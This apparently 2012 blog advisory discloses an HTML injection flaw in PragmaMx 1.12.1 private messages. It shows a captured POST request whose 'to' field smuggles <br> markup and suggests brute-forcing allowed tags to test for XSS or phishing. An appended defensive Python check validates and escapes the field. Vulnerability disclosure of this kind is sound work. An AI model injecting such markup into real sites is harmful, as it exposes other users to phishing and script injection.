Sunday 18 March 2012

[EN] PragmaMX 1.12.1 - simple "html injection"


# TITLE ....... # PragmaMx 1.12.1 Basic HTML Injection (for users logged-in) ............ #
# DATE ........ # 17.03.2012 ............................................................ #
# AUTHOR ...... # http://hauntit.blogspot.com ........................................... #
# SOFT LINK ... # http://www.pragmamx.org ............................................... #
# VERSION ..... # 1.12.1 ................................................................ #
# TESTED ON ... # LAMP .................................................................. #
# ....................................................................................... #

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is the bug :)
# 4. More...

#............................................#
# 1. What is this?
This is a very nice CMS, you should try it! ;)

#............................................#
# 2. What is the type of vulnerability?
I called it 'basic HTML injection' because a logged-in user can send HTML through this form.
We cannot send all HTML tags, only the ones defined in the web application.
To find out whether XSS or phishing is possible, we can try to 'bruteforce' all HTML tags
(in this scenario the accepted tags should be similar to the tags we (the user) can add in posts).

#............................................#
# 3. Where is the bug :)
...cut from Burp...
POST /www/pragmamx.1.12.1/html/modules.php?name=Private_Messages HTTP/1.1
Host: localhost
(...)

subject=aaaaa&message=aaaaaaaaaaaaaaaaa&name=Private_Messages&file=buddy&to_userid=3&op=send&to=test;)<br>test;)<br>test;)<br>test;)<br>&x=59&y=22
...cut from Burp...
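
A defensive check built around the captured request above (an added example, not code from the original post or from PragmaMx): it parses the form body, reports which parameters carry HTML markup, and applies an allow-list check and output encoding to the recipient value. The user-name pattern and all function names are assumptions.

```python
import html
import re
from urllib.parse import unquote_plus

# Form body copied from the Burp capture above.
CAPTURED_BODY = (
    "subject=aaaaa&message=aaaaaaaaaaaaaaaaa&name=Private_Messages&file=buddy"
    "&to_userid=3&op=send&to=test;)<br>test;)<br>test;)<br>test;)<br>&x=59&y=22"
)

# Assumption: a recipient is a plain user name. PragmaMx's real rules may differ.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,25}")
# Anything that looks like the start of an HTML tag, comment or character entity.
MARKUP_RE = re.compile(r"<\s*[/!A-Za-z]|&#?\w+;")


def parse_form(body):
    """Split an urlencoded body on '&' only, so ';' inside values is preserved."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields


def fields_with_markup(fields):
    """Names of parameters whose decoded value contains HTML-like markup."""
    return sorted(k for k, v in fields.items() if MARKUP_RE.search(v))


def is_valid_recipient(value):
    """Allow-list check to run before the value is stored or displayed."""
    return USERNAME_RE.fullmatch(value) is not None


def render_recipient(value):
    """Output encoding: the value is shown as text, never parsed as HTML."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    form = parse_form(CAPTURED_BODY)
    print("parameters carrying markup:", fields_with_markup(form))
    print("recipient accepted:", is_valid_recipient(form["to"]))
    print("encoded for display:", render_recipient(form["to"]))
```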

#............................................#
# 4. More...

- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net

#............................................#
# Best regards
#
